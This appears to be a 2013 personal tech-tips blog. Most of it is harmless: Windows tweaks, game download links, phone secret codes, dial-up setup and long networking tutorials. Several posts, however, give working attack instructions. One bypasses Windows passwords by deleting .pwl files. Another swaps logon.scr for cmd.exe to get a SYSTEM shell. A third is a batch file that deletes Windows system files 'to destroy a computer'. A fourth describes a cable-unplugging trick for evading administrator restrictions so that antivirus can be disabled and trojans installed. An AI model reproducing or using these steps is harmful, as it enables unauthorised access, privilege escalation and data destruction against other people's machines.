Thursday, 31 October 2013

Shutdown Trick !

Imidiate rapid shut down window
while shutting down window. open task manager(Ctr+Alt+Del),
Select shut down tab. and press ' Ctrl ' key while select Turn Off from dis tab.
Count 5 4 3 2 1 Voila!!! U r window will rapidly shut down.


Speed Up Ur Shut down !!

Start Regedit.
Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.
Click on the "Control" Folder.
Select "WaitToKillServiceTimeout"
Right click on it and select Modify.
Set it a value lower than 2000 (Mine is set to 200)
.

and !

Like previous versions of windows, it takes long time to restart or shutdown windows xp when the "Exit Windows" sound is enabled. to solve this problem you
must disable this useless sound. click start button then go to settings -> control panel -> Sound,Speech and Audio devices -> Sounds and Audio Devices -> Sounds, then under program events and windows menu click on "Exit Windows" sub-menu and highlight it.now from sounds you can select,choose "none" and then click apply and ok. now you can see some improvements when shutting down your system.

Wednesday, 30 October 2013

Funny Creatures download

Funny Creatures download

Funny Creatures downloadv.2.131.3 MbPuzzle
Free download Funny Creatureshttp://www.astatix.com/fcreatures.exe
Help Funny Creatures return to their positions in the maze. Creatures can move only in a straight line until collision with the wall or other creature.

Crazy Tetris download

Crazy Tetris download

Crazy Tetris downloadv.2.211 MbPuzzle/Action/Tetris
Free download Crazy Tetrishttp://www.astatix.com/crazytet.exe
Unusual clone of the immortal Tetris game. In this game blocks consist not only of squares, but of triangles too. Crazy Tetris includes 6 absolutely different variations of the famous game with falling blocks. The goal of the Crazy Tetris game is to maximize your score by placing the falling blocks into lines.

Bubble Bobble Nostalgie download

Bubble Bobble Nostalgie download

Bubble Bobble Nostalgie downloadv.2.912.8 MbArcade
Free download Bubble Bobble Nostalgiehttp://www.astatix.com/bubblebobble.exe
On each stage you play one or pair of little dragons against enemies. These dragons can blow bubbles to catch enemies inside. After that you should jump on bubble with an enemy trapped inside and pop them!

Bookworm Adventures download

Bookworm Adventures download

Bookworm Adventures downloadv.1.022 MbWord
Free download Bookworm Adventures:http://www.astatix.com/files/BookwormAdventuresSetup.exe
Help Lex confront the most terrible threat the Great Library has ever known by spelling words to vanquish villains, whomp foes and annihilate enemies!

Poker Superstars II download

Poker Superstars II download

Poker Superstars II download
11.3 MbCards/Poker
Free download Poker Superstars IIhttp://www.astatix.com/files/pokersuperstars.exe
It's time for Season 2 - with more superstars, a bigger tournament and a brand new poker AI that will challenge you to play your best game ever!

Puzzle Inlay download

Puzzle Inlay download

Puzzle Inlay download
5 MbPuzzle
Free download Puzzle Inlayhttp://www.astatix.com/puzzinly.exe
Inlay pictures with gems. You are offered over 100 picture puzzles to inlay with gems. Use 18 varieties of gems, magic tools and bonuses.

Double Digger download

Double Digger download

Double Digger downloadv.1.05.8 MbArcade/Classic
Free download Double Diggerhttp://www.astatix.com/doubledigger.exe
Guide a small bulldozer through underground levels and gather gems, avoid baddies and free gold bags.

Super Text Twist download

Super Text Twist download

Super Text Twist downloadv.2.22.7 MbWord
Free download Super Text Twisthttp://www.astatix.com/texttwist.exe
Make as many words as possible with either six or seven random letters in this word search puzzle game.

GSM Secret Codes

GSM Secret Codes

Type *#61# and press call - Check redirection status.Cancel all redirections:
##002# *43# to activate call waiting, to deactivate #43#. 

If your phone doesn't have incoming call barring and outgoing call barring, you can try this. For outgoing call barring dial *33*barcode*# and pres OK.

To deactivate it dial #33#barcode*#. On any phone on any network type in **43# to enable conference calls. You can make up to 7 calls at onceIf you need to block SMS reception (if you are spammed by someone) just press this code: *35*xxxx*16# xxxx is your Call Barring code (default is 0000). To remove this barring type: #35*xxxx# If you want to hide/show your phone number when calling, put one of these codes below in front of the number that you are going to call.(*#30# / *#31# or *31# / #31# ) Works on some networks.Typing *0# or *nm# on the beginning of a txt message gives you detailed delivery report on some networks.. But turn off reports in message settings before.When the sim card-pin blocked type **042*pin2 old*newpin2*newpin2*##002# *43# to activate call waiting, to deactivate #43#. 
If your phone doesn't have incoming call barring and outgoing call barring, you can try this. For outgoing call barring dial *33*barcode*# and pres OK.

To deactivate it dial #33#barcode*#. On any phone on any network type in **43# to enable conference calls. You can make up to 7 calls at onceIf you need to block SMS reception (if you are spammed by someone) just press this code: *35*xxxx*16# xxxx is your Call Barring code (default is 0000). To remove this barring type: #35*xxxx# If you want to hide/show your phone number when calling, put one of these codes below in front of the number that you are going to call.(*#30# / *#31# or *31# / #31# ) Works on some networks.Typing *0# or *nm# on the beginning of a txt message gives you detailed delivery report on some networks.. But turn off reports in message settings before.When the sim card-pin blocked type **042*pin2 old*newpin2*newpin2*If your phone doesn't have incoming call barring and outgoing call barring, you can try this. For outgoing call barring dial *33*barcode*# and pres OK.
To deactivate it dial #33#barcode*#. On any phone on any network type in **43# to enable conference calls. You can make up to 7 calls at onceIf you need to block SMS reception (if you are spammed by someone) just press this code: *35*xxxx*16# xxxx is your Call Barring code (default is 0000). To remove this barring type: #35*xxxx# If you want to hide/show your phone number when calling, put one of these codes below in front of the number that you are going to call.(*#30# / *#31# or *31# / #31# ) Works on some networks.Typing *0# or *nm# on the beginning of a txt message gives you detailed delivery report on some networks.. But turn off reports in message settings before.When the sim card-pin blocked type **042*pin2 old*newpin2*newpin2*To deactivate it dial #33#barcode*#. On any phone on any network type in **43# to enable conference calls. You can make up to 7 calls at onceIf you need to block SMS reception (if you are spammed by someone) just press this code: *35*xxxx*16# xxxx is your Call Barring code (default is 0000). To remove this barring type: #35*xxxx# If you want to hide/show your phone number when calling, put one of these codes below in front of the number that you are going to call.(*#30# / *#31# or *31# / #31# ) Works on some networks.Typing *0# or *nm# on the beginning of a txt message gives you detailed delivery report on some networks.. But turn off reports in message settings before.When the sim card-pin blocked type **042*pin2 old*newpin2*newpin2*

Airtel Secret Codes

Dial *123# to see your credit balance.

Dial *110# and follow the options.

Dial *109*9898631902# to display the call cost after each call.

Sony Ericsson Secret Codes

Sony Ericsson Secret Menu: ->



* <- <- * <- *(-> means press joystick, arrow keys or jogdial to the right and <- means left.)You'll see phone model, software info, IMEI, configuration info, sim lock status, REAL time clock, total call time and text labels. You can also test your phones services and hardware from this menu (main display, camera, LED/illumination, Flash LED, keyboard, earphone, speaker, microphone, radio and vibrator tests)IMEI Number: *#06#Lockstatus: <- * * <-Shortcut to last dialed numbers: 0#Shortcut to sim numbers: On main menu type a number and press #If you change the language from default to any other language, then it may be difficult to switch to default language. The shortcut is very simple. Just press <> . <> stands for right arrow button or joystick.

Important! Try these codes at your own risk! We don't accept any complaints. Some of these codes may not work.

LG Secret Codes

LG all models test mode: Type 2945#*# on the main 

screen.2945*#01*# Secret menu for LG



IMEI (ALL): *#06# IMEI and SW (LG 510):
*#07#Software version (LG B1200):
*8375#Recount cheksum (LG B1200):
*6861# Factory test (B1200):
#PWR 668 Simlock menu (LG B1200):
1945#*5101# Simlock menu (LG 510W, 5200):
2945#*5101#Simlock menu (LG 7020, 7010):
2945#*70001# Simlock menu (LG 500, 600):
2947#*LG-U81XX SPECIAL CODESCode to read phone version : -
Phone without SIM - Enter 277634#*# or 47328545454#- Select 'SW Ver.info'Code to reset phone : -
Phone without SIM - Enter 277634#*# or 47328545454#- Select 'Factory Reset'Code to enter UNLOCK MENU : -
Phone wit SIM inside - Enter 2945#*88110#Test Menu 8330 :
637664#*#Test Menu 8180 V10a: 49857465454#Test Menu 8180 V11a: 492662464663#Test Menu 8130-8138:
47328545454#Test Menu 8110-8120: 277634#*#

Secret Phone Codes

Type 000000* on an Alcatel to see how much the 

battery is discharged.

Alcatel: ###337*07# - Phone restarts itself.


Important! Try these codes at your own risk! We don't accept any complaints. Some of these codes may not work.

PTCL phone n Net DialUp Settings

Windows XP1. Click on "Start Menu" then "Control Panel".2. Double-click on the "Network Connections" icon.3. Under the "Network Tasks" panel, select Create a new connection to start the "New Connection Wizard".4. Click Next to advance to the "Network Connection Type" window.5. Choose "Connect to the Internet" and click Next.6. In the "Getting Ready" window, choose "Set up my connection manually" and click Next.7. In the "Internet Connection" window, choose "Connect using a dial-up modem" and click Next.8. In the "Connection Name" window, type “PTCL” in the ISP Name field and click Next.9. In the "Phone Number to Dial" window, type 13177777 in the Phone Number field and click Next.10. In the "Internet Account Information" window, type in your PTCL username and password and click Next.11. After finishing the "New Connection Wizard", check the Add a shortcut to this connection to my desktop checkbox for easy access to the PTCL connection icon.

Format Nokia Symbian Mobile Phones

Format Nokia Symbian Mobile Phones


Nokia Symbian Mobile Phones
Quite some times back we did mention a simple tips on how to self clean virus on Symbian phone that will hard reset your mobile device to its factory default condition but in case the security code, which is required before you can proceed to hard reset your mobile device has been changed (default one is 12345) and you cannot recall the right one, here is another useful code that can be used to hard reset your mobile phone to original factory condition without worrying about the security code correctness.
Nokia Symbian Mobile Phones
For the start, make sure the phone is in OFF condition. On the phone keypad, press and hold down the key ‘3’, ‘*’ and ‘Talk’ buttons simultaneously, then followed by a power ON button press. Wait for few seconds until a ‘formatting’ word appeared on the mobile screen and then release the buttons. The whole process will take less than one minute with the progress bar showing the status of formatting. Again be cautious that by doing these combination button press you are actually doing a deep hard reset on your mobile, which also means it will erase everything including your profile, personal data and put the phone back to factory default setting.

This is especially useful whenever your symbian mobile phone is experiencing software instability due to virus infection or installed applications and without costing you any cent, the simple tips will help you recover them in simple steps.

Connecting a Printer to a Wireless Router

First, check the documentation that came with your printer to determine how it's designed to connect to computers. Connections made through Ethernet, USB and (obsolescent) parallel ports are common, but newer printers are sometimes wireless-enabled and allow you to simply add them to your wireless network.
Refer to the owner's manual for your particular wireless router. Inside, find the default IP address and the default login info. If you own a Linksys router, the IP address is usually 192.168.1.1. Other popular brands D-Link and Netgear generally use 192.168.0.1.

Use free zong Internet in Pakistan

Use free zong Internet in Pakistan



hey........!!! frends i am telling about how can use free internet in your mobile with ZONG connection
its 2 simple Step:



Zong free Internet
STEP: (1)  => Go Write Msg Option  type your: Mobile Company Name, Mobile Model, Internet 

And send Msg 131
 

=>>> PlzZ save your setting 
with code 1234

STEP: (2)  
=> And than Go Internet setting profile
Edit: APN
Change your APN setting; 


==>> Type this One
 

APN: Wapgw: 10.81.6.33
Use Free Internet & enjoy....

Installing and configuring a Wireless Router

A wireless router affords laptop or portable computer users greater mobility in their homes and businesses. In most home networks, wireless routers are connected to a cable or DSL modem, and the router sends the signals and information that make up an Internet protocol (IP) thread to the user's computer via radio signals rather than wires.
To communicate with the wireless router, individual computers house transceivers such as an internal expansion card, a peripheral docked by USB or, in the case of laptops, a PC card or hard-wired internal device. For those accessing the Internet through a high-speed connection, a wireless router can also serve as a hardware firewall (as opposed to a software program), enabling protection from undesirable outside computers without exhausting as many system resources as traditional firewall programs.

Set Processes Priority

Follow this tip to increase the priority of active processes, this will result in prioritisation of processes using the CPU.

CTRL-SHIFT-ESC

1.Go to the second tab called Processes, right click on one of the active processes, you will see the Set Priority option

2.For example, your Run your CDwriter program , set the priority higher, and guess what, no crashed CD’s

Install Windows xp in less than 15 minutes

Now, this tip will be very helpful for those who frequently install windows xp operating system. Normally OS installation takes around 40 minutes to complete, but through this trick you can now save 10-15 minutes. This simple tricks goes this way.

1. Boot through Windows XP CD.

2. After all the files are completely loaded, you get the option to select the partition. Select “c”.
3. Now Format the partition, whether it is normal or quick with NTFS or FAT
4. Once the formatting is completed, All the setup files required for installation are copied. Restart your system by pressing Enter.
Now, here begins the Simple trick to save 10-15 minutes.
5. After rebooting, you get a screen where it takes 40 minutes to complete or finalize the OS installation.
6. Now, Press SHIFT + F10 Key ->  This opens command prompt.
7. Enter “Taskmgr” at the command prompt window. This will open Task Manager.
8. Click the Process Tab, here we find a process called Setup.exe -> Right Click on Setup.exe -> Set Priority -> Select High or Above Normal. Initially it will be Normal.
Thats it, no more work to do. Relax your self and see how fast the installation process completes

Tuesday, 29 October 2013

HOW TO SOLVE PROBLEM, SERVER SECURITY CERTIFICATE IS NOT YET VALID

Some time you install fresh Operating system in your computer and then you install Browser, google chrome. After installation you try to open gmail, yahoo, or facebookin google chrome but you do not see your required page and see a message “Server Security Certificate is not yet valid”.  Then you also try to open the page by clicking on “continue anyway” but the result is same.




Infect this problem occurs due to incorrect date and time of your computer. By synchronizing your system clock you can solve this problem.I will tell you the best solution of this problem. Just follow these steps and after completion you will be able to login to facebook, yahoo, gmail etc.



Click on Start Menu and then control penal. 

Open Date/Time setting 

Adjust correct date and time according to your region. 


 Open "Internet Time Zone" tab.  


 Click on "Update Now" button. After clicking on button, It will start synchronzing your internet server timing. 


After 7-8 seconds you will see a message, "The time has been successfully synchronized with time.windows.com on 07-07-2013 at 5:09PM. 


Done 

    Now try to open facebook, yahoo or gmail in google chrome again. Surely you will login successfully.

    How to Gain Access to a Blocked Folder In WIN NT

    If u're system administrator has blocked or denied access to any of u'redrives or folders, u can access them easily.
    Just open any application program such as notepad , msword, exel etc then : Simply GO to FILE then goto OPEN, U will be in my documents folder ,then u can go the folder to which u want but the rights are not provided,single click on that folder & press [ control + c ] .
    Now go to the folder to which u have the rights & press [control + v ]The folder gets copied to the folder to which u have rights to Access.So that u can access that folder.And open the File u Want.

    Hacking Windows Login Paswords

    During Windows startup press F8 key (i.e., before the startupsplash screen) and select ?command prompt only?. Go to c:\windowsdirectory and delete the password file(*.pwl ? where * is theusername) and restart the system. When the password dialog box or thepops up appears, type the username(previous One) and enter any password of u're choice. Windows should accept any password.THIS HAS KNOWN TO WORK FOR WIN98 & WIN ME & IT MIGHT WORK FOR OTHER VERSONS AS WELL.

    Accessing the Comp. as an Administrator in a Locked Environment

    If you can log in as an account in WIn NT then go to MS-DOS -> run -> command, at the C: prompt type the following
    C:\> cd \winnt\system32 C:\winnt\system32> copy logon.scr logon.scr.old C:\winnt\system32> del logon.scr C:\winnt\system32> copy cmd.exe logon.scr 
    Now log off the machine, logon.scr is the screen saver that will kick in after 15-20 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just to C:\> net user administrator and then log in with the new account. 
    Try this, might work, as long as the administrator has not changed default permissions or access rights on C:\winnt and C:\winnt\system32.

    Creating a Batch File to Destroy a Comp.having Windows 98 on it

    Type the following code in notepad:
    @echo offecho your computer has lived its life echo Gurneet Singh Rules!!echo astalavista baby!!del c:\windows\explorer.exedel c:\windows\*.*clsexit
    Then save the file as anyname.batDouble click on it if u want to destroy a computer.

    Display a notice every time Windows starts

    You can use this trick if you want a message to be displayed everytime Windows starts(Any Version). Go to START --> RUN. Type REGEDIT & press ENTER.Then Go to:-?HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon?. Create anew string values as follows.Name: LegalNoticeText and Value: Your message hereAfter Doing this, restart your Windows, a dialog box shouldappear before the Windows startup which will have u're message written on it.Enjoy.

    Breaking the Restrictions of the Administrator by "UNPLUGGING METHOD".

    This works on WIn 2000 & WIN XP.I will teach u how we can gain access to the website you want to for free, and how you can gain access to 'control panel', and the various other tools of Widows that may have been blocked from your grasp like 'regedit'. When u are at the log on screen, type in your username and password. NOW When you hit enter, and it comes up with the next screen, the rectangle one, immediatly pull out the network cable i.e. the cable wire.
    Now u can log on without any restrictions because when the cable is pulled off then it does not download any settings from the server. Now you have access to control panel, & all the other features which had been blocked BUT there will be no network access. But that's cool because now we can access 'Internet options', click in the 'connections' tab click the LAN settings, click the proxy settings, and in the little white box at the bottom we can specify websites that bypass the proxy server (eg www.yahoo.com) Now once you have changed the settings to what you wish, apply them and restart the computer. Now get someone else to log onto it because if you log in it will load the cached settings from your previous log in, then after the other person logs in, everyone that logs in after them included themselves will have the internet settings you specified.
    This is just an 'Unplugging technique' to gain access to a comp. locked by the administrator.Now you can gain access to msconfig, regedit, command etc disable the virus scanner, u can install a trogan or a virus according to u're will. And now there is nothing the administrator can do about this.

    Wednesday, 23 October 2013

    What is a Network?

    A network consists of two or more computers that are linked in order to share resources (such as printers and CDs), exchange files, or allow electronic communications. The computers on a network may be linked through cables, telephone lines, radio waves, satellites, or infrared light beams.
    Two very common types of networks include:
    You may also see references to a Metropolitan Area Networks (MAN), a Wireless LAN (WLAN), or a Wireless WAN (WWAN).

    Local Area Network

    A Local Area Network (LAN) is a network that is confined to a relatively small area. It is generally limited to a geographic area such as a writing lab, school, or building.
    Computers connected to a network are broadly categorized as servers or workstations. Servers are generally not used by humans directly, but rather run continuously to provide "services" to the other computers (and their human users) on the network. Services provided can include printing and faxing, software hosting, file storage and sharing, messaging, data storage and retrieval, complete access control (security) for the network's resources, and many others.
    Workstations are called such because they typically do have a human user which interacts with the network through them. Workstations were traditionally considered a desktop, consisting of a computer, keyboard, display, and mouse, or a laptop, with with integrated keyboard, display, and touchpad. With the advent of the tablet computer, and the touch screen devices such as iPad and iPhone, our definition of workstation is quickly evolving to include those devices, because of their ability to interact with the network and utilize network services.
    Servers tend to be more powerful than workstations, although configurations are guided by needs. For example, a group of servers might be located in a secure area, away from humans, and only accessed through the network. In such cases, it would be common for the servers to operate without a dedicated display or keyboard. However, the size and speed of the server's processor(s), hard drive, and main memory might add dramatically to the cost of the system. On the other hand, a workstation might not need as much storage or working memory, but might require an expensive display to accommodate the needs of its user. Every computer on a network should be appropriately configured for its use.
    On a single LAN, computers and servers may be connected by cables or wirelessly. Wireless access to a wired network is made possible by wireless access points (WAPs). These WAP devices provide a bridge between computers and networks. A typical WAP might have the theoretical capacity to connect hundreds or even thousands of wireless users to a network, although practical capacity might be far less.
    Nearly always servers will be connected by cables to the network, because the cable connections remain the fastest. Workstations which are stationary (desktops) are also usually connected by a cable to the network, although the cost of wireless adapters has dropped to the point that, when installing workstations in an existing facility with inadequate wiring, it can be easier and less expensive to use wireless for a desktop.
    See the TopologyCabling, and Hardware sections of this tutorial for more information on the configuration of a LAN.

    Wide Area Network

    Wide Area Networks (WANs) connect networks in larger geographic areas, such as Florida, the United States, or the world. Dedicated transoceanic cabling or satellite uplinks may be used to connect this type of global network.
    Using a WAN, schools in Florida can communicate with places like Tokyo in a matter of seconds, without paying enormous phone bills. Two users a half-world apart with workstations equipped with microphones and a webcams might teleconference in real time. A WAN is complicated. It uses multiplexers, bridges, and routers to connect local and metropolitan networks to global communications networks like the Internet. To users, however, a WAN will not appear to be much different than a LAN.

    Advantages of Installing a School Network

    User access control.
    Modern networks almost always have one or more servers which allows centralized management for users and for network resources to which they have access. User credentials on a privately-owned and operated network may be as simple as a user name and password, but with ever-increasing attention to computing security issues, these servers are critical to ensuring that sensitive information is only available to authorized users.
    Information storing and sharing.
    Computers allow users to create and manipulate information. Information takes on a life of its own on a network. The network provides both a place to store the information and mechanisms to share that information with other network users.
    Connections.
    Administrators, instructors, and even students and guests can be connected using the campus network.
    Services.
    The school can provide services, such as registration, school directories, course schedules, access to research, and email accounts, and many others. (Remember, network services are generally provided by servers).
    Internet.
    The school can provide network users with access to the internet, via an internet gateway.
    Computing resources.
    The school can provide access to special purpose computing devices which individual users would not normally own. For example, a school network might have high-speed high quality printers strategically located around a campus for instructor or student use.
    Flexible Access.
    School networks allow students to access their information from connected devices throughout the school. Students can begin an assignment in their classroom, save part of it on a public access area of the network, then go to the media center after school to finish their work. Students can also work cooperatively through the network.
    Workgroup Computing.
    Collaborative software allows many users to work on a document or project concurrently. For example, educators located at various schools within a county could simultaneously contribute their ideas about new curriculum standards to the same document, spreadsheets, or website.

    Disadvantages of Installing a School Network

    Expensive to Install.
    Large campus networks can carry hefty price tags. Cabling, network cards, routers, bridges, firewalls, wireless access points, and software can get expensive, and the installation would certainly require the services of technicians. But, with the ease of setup of home networks, a simple network with internet access can be setup for a small campus in an afternoon.
    Requires Administrative Time.
    Proper maintenance of a network requires considerable time and expertise. Many schools have installed a network, only to find that they did not budget for the necessary administrative support.
    Servers Fail.
    Although a network server is no more susceptible to failure than any other computer, when the files server "goes down" the entire network may come to a halt. Good network design practices say that critical network services (provided by servers) should be redundant on the network whenever possible.
    Cables May Break.
    The Topology chapter presents information about the various configurations of cables. Some of the configurations are designed to minimize the inconvenience of a broken cable; with other configurations, one broken cable can stop the entire network.
    Security and compliance.
    Network security is expensive. It is also very important. A school network would possibly be subject to more stringent security requirements than a similarly-sized corporate network, because of its likelihood of storing personal and confidential information of network users, the danger of which can be compounded if any network users are minors. A great deal of attention must be paid to network services to ensure all network content is appropriate for the network community it serves

    HOW TO SHARE A BROADBAND CONNECTION

    Summary

    This document is about broadband connection sharing, and it will help you answer the following questions:
    • Can I connect two PCs to a broadband connection?
    • How do I share a broadband connection with 3 (or more) PCs?
    • Can I use a crossover network cable to share an Internet connection?
    • Should I use Microsoft ICS, a broadband hardware router or a Linux router?
    It does this by covering the following topics:
    • Methods for sharing a broadband connection
    • How to network 2 computers for broadband connection sharing
    • How to network 3 or more computers for broadband connection sharing
    • How to share a broadband connection with a USB ADSL modem
    • How to share an Internet connection with a cable modem

    Introduction

    This document describes the three most common techniques used to share a broadband internet connection with multiple computers. The first solution, sharing a broadband connection using Microsoft Internet Connection Sharing, is suitable for home use and low-budgets. The second method, Sharing a broadband connection using a dedicated broadband router, is a better solution for small businesses and homes when more flexibility is needed. The final method, sharing a broadband connection using a Linux router, is the most advanced solution: it offers the broadest range of features and the most control over security, logging and access.

    Contents of this page:

    Method 1: Sharing a broadband connection using Microsoft Internet Connection Sharing

    Description

    Microsoft Internet Connection Sharing (ICS) enables a computer connected to the Internet via a cable or DSL modem to share its connection with other computers connected to it. It is cheap because of its minimal hardware requirements and fairly straight forward to set up. However it is only suitable for situations with limited requirements.
    Microsoft Internet Connection Sharing is software built into Microsoft Windows 98 SE, Windows 98 ME, Windows XP and Windows 2000. ICS enables a computer connected to the Internet via a cable or DSL modem to share its connection with other computers connected to it via Ethernet cable.
    The network can be set up in two ways, depending on the number of computers that need to share the connection.

    For two computers only

    When only one other computer needs to share this connection (as in Figure 1), then Computer #2 can connect directly to Computer #1 using a crossover cable. Note that both computers must have network cardsinstalled.

    Hardware requirements for connection sharing using Microsoft ICS with two computers

    1 x network card per computer
    Each computer must have a Network Interface Card (NIC) installed.
    1 x Ethernet crossover cable
    A crossover cable is a type of Ethernet cable wired in such a way that it can connect two computers directly together, removing the need for a hub or switch. The cable must be long enough to connect both PCs together.
    1 x broadband modem
    The broadband modem is like an ordinary telephone modem except it connects you to a broadband service instead of a dial-up service.
    See the Glossary of Broadband Internet Terms for further descriptions of hardware and terms.

    For three or more computers

    When more than one other computer needs to share the connection with Computer #1 then you need to use a switch (or hub) (Figure 2). This time the computers are all connected to the switch using standard Ethernet cable.

    Hardware requirements for connection sharing using Microsoft ICS with three or more computers

    1 x switch (or hub)
    The switch (or hub) allows all computers on the network to communicate with each other.
    1 x network card per computer
    Each computer must have a Network Interface Card (NIC) installed.
    1 x Ethernet (straight through) cable per computer
    Each computer is connected to the switch (or hub) using Ethernet cable. The cable lengths must be long enough to connect all the devices, but should not be longer than 100m.
    1 x broadband modem
    The broadband modem is like an ordinary telephone modem except it connects you to a broadband service instead of a dial-up service.
    See the Glossary of Broadband Internet Terms for further descriptions of hardware and terms.

    Pros and Cons of using Microsoft ICS

    Pros

    • It's free. ICS comes as standard with both Windows XP and Windows 2000.
    • It is fairly simple to set up.
    • Minimal additional hardware is required, so it is quite a cheap solution.

    Cons

    • The gateway computer (Computer #1) must be turned on for the other computers to use its connection. If Computer #1 breaks, then so does the internet connection for the other computers.
    • ICS does not support certain applications such as MSN Messenger and NetMeeting.
    • ICS has no support for content filtering and logging.
    • There is an additional load on Computer #1 which may have a performance impact.

    Method 2: Sharing a broadband connection using a hardware broadband router

    Summary

    A dedicated broadband router is a much better approach than the one above when more than two computers need to share one broadband internet connection. With this method, all computers on the network are connected together using a switch (or hub), and the switch is connected to the broadband router. All the computers can then connect to the internet using the router as a gateway (see Figure 3). The router would normally be left on; it has no moving parts, is low voltage and silent. This means that any computer on the network can connect to the internet at any time without delay.

    Description

    Broadband routers start at quite a low price: £60 or so will get you one that works. However the price range is very broad; the more you spend the more features you will get.
    All routers provide a degree of network security through a technology called Network Address Translation or NAT. NAT means that computers on the internet can only see your router, and they cannot gain direct access to your own computer.
    Broadband routers usually have no moving parts in them (i.e. a disk or fan), so they are silent in operation and hardly ever fail.
    Setting broadband routers up is usually a straight-forward process too. Most will automatically detect the necessary settings, and they will usually set up your home network for you too (using a technology calledDynamic Host Configuration Protocol or DHCP).

    Why use this approach?

    • When more than two computers need to share an internet connection.
    • When the uptime of the main 'gateway' computer cannot be relied upon (as is the case with Microsoft ICS).
    • When you don't want your own computer connected directly to the internet for security reasons.
    • When the additional security features of a router are desirable.

    Hardware Requirements for connection sharing using a broadband router

    1 x network card and network cable per computer
    Each computer must have an Ethernet Network Interface Card (NIC) installed, and must be connected to the router with Ethernet cable.
    1 x broadband router
    It is the router that allows multiple computers on a network to use the same internet connection. Broadband routers typically perform multiple tasks, and those suitable for home and small office use will often have a built in four port switch, router (and firewall), and either a cable or ADSL modem. It is usually preferable to use an all in one solution than three separate devices.
    1 x switch (if not included with the router)
    If the broadband router does not have a built in switch, then a separate one will need to be purchased. You must make sure the switch has enough ports to connect all the computers and the router together. See Figure 4.
    1 x broadband modem (if not included with the router)
    If the broadband router does not have a built in modem (either a cable or ADSL modem), then you will have to purchase a separate modem. Most routers will require that the modem has an Ethernet port to connect to. However many broadband modems are either PCI (internal cards) or external devices with USB connections. These types of modems will not work with typical routers, so care should be taken when making a purchasing decision. See Figure 4.
    See the Glossary of Broadband Internet Terms for further descriptions of hardware and terms.

    Method 3: Sharing a broadband connection using a Linux router

    Summary

    A dedicated Linux router offers the greatest control over access, security and logging. Linux is an operating system designed from the ground up to be secure and robust in a network environment. The software required to configure a Linux computer as a router and firewall comes as standard with the operating system.
    In terms of usage, a Linux router is very similar to that of a hardware router: all computers on the network are connected together using a switch (or hub), and the switch is connected to the Linux router. All the computers can then connect to the internet using the router as the gateway (see Figure 5).
    Using a Linux router you have full control over the traffic that is allowed in and out of your network. You can control who accesses what and at what time, and you can log everything that passes through your internet connection. However, this flexibility comes at a premium: the configuration of such a computer is not for beginners!

    Hardware Requirements for connection sharing using a Linux router

    1 x network card and network cable per computer
    Each computer must have an Ethernet Network Interface Card (NIC). The Ethernet cable must be long enough to connect all the PCs and the router to the switch.
    1 x Linux router
    A PC with the Linux operating system installed can be used as a router. The PC can be an old one that would otherwise be redundant. Popular choices of Linux distributions for this purpose include Debian GNU/Linux and Red Hat Linux.
    1 x switch (or hub)
    You must make sure the switch has enough ports to connect all the computers and the Linux router together.
    1 x broadband modem
    You should choose a modem that has an Ethernet LAN-side connection. External USB modems are not suitable for using with Linux routers, though you may have some success with an internal PCI 

    Masala FM

    Free Shoutcast HostingRadio Stream Hosting